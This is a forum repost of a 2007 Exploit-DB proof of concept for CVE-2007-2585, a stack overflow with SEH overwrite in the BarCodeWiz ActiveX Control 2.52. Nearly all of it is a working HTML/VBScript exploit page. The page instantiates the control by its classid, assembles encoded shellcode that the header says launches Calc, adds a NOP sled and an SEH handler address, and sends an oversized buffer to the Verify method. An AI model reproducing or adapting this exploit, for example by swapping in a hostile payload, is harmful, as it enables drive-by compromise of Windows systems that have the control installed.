Exploit Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3882
Проверка EDB
  1. Пройдено
Автор
PARVEEN VASHISHTHA
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2007-2585
Дата публикации
2007-05-09
HTML:
<!--

  ===============================================================================================
         BarCodeWiz ActiveX Control 2.52 (BarcodeWiz.dll)Stack Overflow SEH Overwrite Exploit
                                          By Parveen Vashishtha
  ==============================================================================================   
        
  Date : 09-05-2007
 
   Open Calc on 2K
 
  
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Thanks to Metasploit and Stroke 

-->
<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6" > </OBJECT>

<script language="vbscript">




shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")                    

pointer_to_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")


targetFile = "C:\Program Files\BarCodeWiz ActiveX Demo\DLL\BarcodeWiz.dll"
prototype  = "Function Verify ( ByVal Barcode As String ) As Boolean"
memberName = "Verify"
progid     = "BARCODEWIZLib.BarCodeWiz"
argCount   = 1

arg1=String(3256,"A")

arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop

target.Verify arg1

 

</script>
</body>
</html>

# milw0rm.com [2007-05-09]
 
Источник
www.exploit-db.com

Похожие темы